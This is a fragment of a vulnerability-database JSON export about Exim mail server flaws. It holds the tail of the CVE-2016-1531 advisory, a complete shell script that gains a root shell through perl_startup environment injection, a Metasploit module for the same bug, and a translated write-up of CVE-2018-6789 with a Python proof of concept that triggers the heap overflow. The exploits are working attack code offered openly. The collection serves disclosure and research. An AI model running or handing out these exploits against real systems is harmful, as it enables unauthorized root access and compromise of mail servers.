SYSTEMS AFFECTED\r\n-------------------------\r\n\r\nExim versions before the latest patched version of Exim 4.86.2 are affected by \r\nthis vulnerability, if Exim was compiled with Perl support and the main \r\nconfiguration file (i.e /etc/exim/exim.conf or /etc/exim4/exim.conf), contains \r\na perl_startup option e.g:\r\n\r\nperl_startup = do '/usr/share/exim4/exigrey.pl'\r\n\r\nIt is important to note that the file does not necessarily have to exist\r\nto exploit the vulnerability. Although the path must be specified.\r\n\r\n\r\nVIII. SOLUTION\r\n-------------------------\r\n\r\nUpdate to Exim 4.86.2 which contains the official patch that fixes the\r\nenvironment sanitization issues.\r\n\r\nIX. REFERENCES\r\n-------------------------\r\n\r\nhttp://legalhackers.com/advisories/Exim-Local-Root-Privilege-Escalation.txt\r\nhttp://www.exim.org/\r\nhttp://www.exim.org/static/doc/CVE-2016-1531.txt\r\nhttp://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html\r\nhttps://github.com/Exim/exim/commit/29f9808015576a9a1f391f4c6b80c7c606a4d99f\r\n\r\nCVE-2016-1531\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1531\r\n\r\nX. ADVISORY CREATED BY\r\n-------------------------\r\n\r\nThis advisory has been created by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\nlegalhackers.com\r\n\r\nXI. REVISION HISTORY\r\n-------------------------\r\n\r\nMarch 10th, 2016: Advisory released\r\nMarch 11th, 2016: Fixed advisory header,added cve.mitre link of the root issue\r\n\r\nXII. LEGAL NOTICES\r\n-------------------------\r\n\r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. 
I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.", "sourceHref": "https://www.exploit-db.com/raw/39549", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-08T11:09:59", "description": "", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-03-09T00:00:00", "type": "exploitdb", "title": "Exim 4.84-3 - Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2016-1531", "CVE-2016-1531"], "modified": "2016-03-09T00:00:00", "id": "EDB-ID:39535", "href": "https://www.exploit-db.com/exploits/39535", "sourceData": "#!/bin/sh\r\n# CVE-2016-1531 exim <= 4.84-3 local root exploit\r\n# ===============================================\r\n# you can write files as root or force a perl module to\r\n# load by manipulating the perl environment and running\r\n# exim with the \"perl_startup\" arguement -ps. 
\r\n#\r\n# e.g.\r\n# [fantastic@localhost tmp]$ ./cve-2016-1531.sh \r\n# [ CVE-2016-1531 local root exploit\r\n# sh-4.3# id\r\n# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)\r\n# \r\n# -- Hacker Fantastic \r\necho [ CVE-2016-1531 local root exploit\r\ncat > /tmp/root.pm << EOF\r\npackage root;\r\nuse strict;\r\nuse warnings;\r\n\r\nsystem(\"/bin/sh\");\r\nEOF\r\nPERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps", "sourceHref": "https://www.exploit-db.com/raw/39535", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T15:58:00", "description": "", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-15T00:00:00", "type": "exploitdb", "title": "Exim - 'perl_startup' Local Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2016-1531", "CVE-2016-1531"], "modified": "2016-04-15T00:00:00", "id": "EDB-ID:39702", "href": "https://www.exploit-db.com/exploits/39702", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < 
Msf::Exploit::Local\r\n\r\n Rank = ExcellentRanking\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exim \"perl_startup\" Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a Perl injection vulnerability in Exim < 4.86.2\r\n given the presence of the \"perl_startup\" configuration parameter.\r\n },\r\n 'Author' => [\r\n 'Dawid Golunski', # Vulnerability discovery\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n %w{CVE 2016-1531},\r\n %w{EDB 39549},\r\n %w{URL http://www.exim.org/static/doc/CVE-2016-1531.txt}\r\n ],\r\n 'DisclosureDate' => 'Mar 10 2016',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'SessionTypes' => %w{shell meterpreter},\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'BadChars' => \"\\x22\\x27\", # \" and '\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd cmd_bash',\r\n 'RequiredCmd' => 'generic netcat netcat-e bash-tcp telnet'\r\n }\r\n },\r\n 'Targets' => [\r\n ['Exim < 4.86.2', {}]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n end\r\n\r\n def check\r\n if exploit('whoami') == 'root'\r\n CheckCode::Vulnerable\r\n else\r\n CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit(c = payload.encoded)\r\n # PERL5DB technique from http://perldoc.perl.org/perlrun.html\r\n cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec \"#{c}\"' exim -ps 2>&-})\r\n end\r\n\r\nend", "sourceHref": "https://www.exploit-db.com/raw/39702", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2018-04-09T16:19:07", "description": "Statement: disclosed herein is a method and script for study and research use, any team or individual may use the disclosure herein related to content engaged in the illegal network attacks, otherwise all the consequences by the user himself to bear with the author of this article has nothing to do. 
\nIn February 2018, the popular open source mail server Exim was found to have a heap overflow vulnerability, CVE-2018-6789, affecting almost all versions prior to 4.90.1. \nThe vulnerability's discoverer\u2014Taiwanese security researcher Meh\u2014described on his blog an approach to exploiting the vulnerability for remote code execution, and also indicated on Twitter that he eventually bypassed various mitigations and successfully achieved remote code execution: \n\n! [](/Article/UploadPic/2018-4/201849174458151. png? www. myhack58. com) \nMeh has not yet disclosed exploit code; skysider, a security researcher at a Huawei lab, reproduced remote command execution in a test environment based on Meh's idea. For the vulnerable environment and the associated code, see: https://github.com/skysider/VulnPOC/tree/master/CVE-2018-6789 \n1\\. Vulnerability cause \nThe root cause of the vulnerability is that the b64decode function, when decoding non-standard base64-encoded data, may overflow the heap by one byte\u2014a fairly classic off-by-one vulnerability. \nThe relevant part of the vulnerable b64decode function is as follows: \nb64decode(const uschar *code, uschar **ptr) \n{ \nint x, y; \nuschar *result = store_get(3*(Ustrlen(code)/4) + 1); \n*ptr = result; \n/* Each cycle of the loop handles a quantum of 4 input bytes. For the last \nquantum this may decode to 1, 2, or 3 output bytes. */ \n...... \n} \nThe base64 decoding logic in this code processes the input in groups of 4 bytes, decoding each group into 3 bytes; but when 3 bytes remain at the end (i.e. len(code)=4n+3), they are decoded into 2 bytes, so the total decoded length is 3n+2 bytes while the allocated heap space is only 3n+1 bytes\u2014hence the heap overflow. The official fix is correspondingly simple: allocate a few more bytes. \n2\\. 
Environment to build \nMeh blog vulnerability test exim version is directly through the apt installation, but since the debian official has been fixed the warehouse in the exim vulnerability, you can view the package source code of the patch information to confirm: \nroot@skysider:~/poc/exim4-4.86.2# apt-get source exim4 \n...... \ndpkg-source: info: applying 93_CVE-2017-1000368. patch \ndpkg-source: info: applying fix_smtp_banner. patch \ndpkg-source: info: applying CVE-2016-9963. patch \ndpkg-source: info: applying CVE-2018-6789. patch \nWe choose to download an earlier version of the source code to compile the installation: \nsudo apt-get build-dep exim4 \nwget https://github.com/Exim/exim/releases/download/exim-4_89/exim-4.89.tar.xz \nDuring compilation you want to install some dependent libraries, you also need to modify the Makefile, create user, configuration, log file permissions, etc., can refer to the Dockerfile of the installation process. \nexim can be specified at run time configuration file, in order to trigger the vulnerability and command execution, you need to configure the CRAM-MD5 authenticator and is set acl_smtp_mail, etc., the configuration file is as follows: \nacl_smtp_mail=acl_check_mail \nacl_smtp_data=acl_check_data \nbegin acl \nacl_check_mail: \n. ifdef CHECK_MAIL_HELO_ISSUED \ndeny \nmessage = no HELO given before MAIL command \ncondition = ${if def:sender_helo_name {no}{yes}} \n. endif \naccept \nacl_check_data: \naccept \nbegin authenticators \nfixed_cram: \ndriver = cram_md5 \npublic_name = CRAM-MD5 \nserver_secret = ${if eq{$auth1}{ph10}{secret}fail} \nserver_set_id = $auth1 \nIn debug mode start the exim service: \nexim-bd-d-receive-C conf. conf \nYou can also directly use the docker to verify the vulnerability, the above commands for the default boot command of: \ndocker run-it --name exim-p 25:25 skysider/vulndocker:cve-2018-6789 \n3\\. 
Vulnerability testing \nWe use a simple poc to trigger the vulnerability, poc code is as follows: \n#!/ usr/bin/python \n# -*- coding: utf-8 -*- \nimport smtplib \nfrom base64 import b64encode \nprint \"this poc is tested in exim 4.89 x64 bit with cram-md5 authenticators\" \nip_address = raw_input(\"input ip address: \") \ns = smtplib. SMTP(ip_address) \n#s. set_debuglevel(1) \n# 1. put a huge chunk into unsorted bin \ns. ehlo(\"mmmm\"+\"b\"*0x1500) # 0x2020 \n# 2. send base64 data and trigger the off-by-one \n#raw_input(\"overwrite one byte of next chunk\") \ns. docmd(\"AUTH CRAM-MD5\") \npayload = \"d\"*(0x2008-1) \ntry: \ns. docmd(b64encode(payload)+b64encode('\\xf1\\xf1')[:-1]) \ns. quit() \nexcept smtplib. SMTPServerDisconnected: \nprint \"[!] exim server seems to be vulnerable to CVE-2018-6789.\" \nWhen executing this Code, it will trigger a memory error \n\n! [](/Article/UploadPic/2018-4/201849174458752. png? www. myhack58. com) \nIn this process, the stack of the main changes are as follows: \n\n! [](/Article/UploadPic/2018-4/201849174459960. png? www. myhack58. com) \nWe can go to observe the error before the stack, attach to the child process, the following figure is to send the ehlo message after the heap: \n\n! [](/Article/UploadPic/2018-4/201849174459191. png? www. myhack58. com) \nSend Auth data, we can look after executing the b64decode function after the heap: \n\n! [](/Article/UploadPic/2018-4/201849174459700. png? www. myhack58. 
com)\n\n**[1] [[2]](<89920_2.htm>) [[3]](<89920_3.htm>) [next](<89920_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-09T00:00:00", "type": "myhack58", "title": "Exim Off-by-One RCE vulnerability of CVE-2018-6789 use analysis(reference EXP)-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-6789", "CVE-2016-9963", "CVE-2017-1000368"], "modified": "2018-04-09T00:00:00", "id": "MYHACK58:62201889920", "href": "http://www.myhack58.com/Article/html/3/62/2018/89920.htm", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}